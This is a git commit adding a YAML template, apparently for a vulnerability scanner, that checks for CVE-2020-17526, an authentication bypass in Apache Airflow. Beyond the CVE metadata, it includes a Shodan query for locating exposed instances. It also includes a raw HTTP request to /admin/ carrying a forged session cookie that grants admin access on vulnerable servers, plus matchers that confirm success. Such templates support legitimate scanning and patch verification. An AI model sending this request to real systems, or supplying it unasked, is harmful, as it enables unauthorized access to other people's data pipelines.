CVE-2020-17526.yaml added
parent
e9fa5bcc16
commit
fce8abd046
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2020-17526
|
||||
|
||||
info:
|
||||
name: Apache Airflow authentication bypass
|
||||
author: piyushchhiroliya
|
||||
severity: high
|
||||
description: Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 7.7
|
||||
cve-id: CVE-2020-17526
|
||||
cwe-id: CWE-287
|
||||
tags: cve,cve2020,apache,airflow
|
||||
metadata:
|
||||
shodan-query: http.title:"Apache Airflow"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /admin/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9,hi;q=0.8
|
||||
Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY
|
||||
Connection: close
|
||||
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DAG"
|
||||
- "Recent Tasks"
|
||||
- "Users"
|
||||
- "SLA Misses"
|
||||
- "Task Instances"
|
||||
condition: and
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue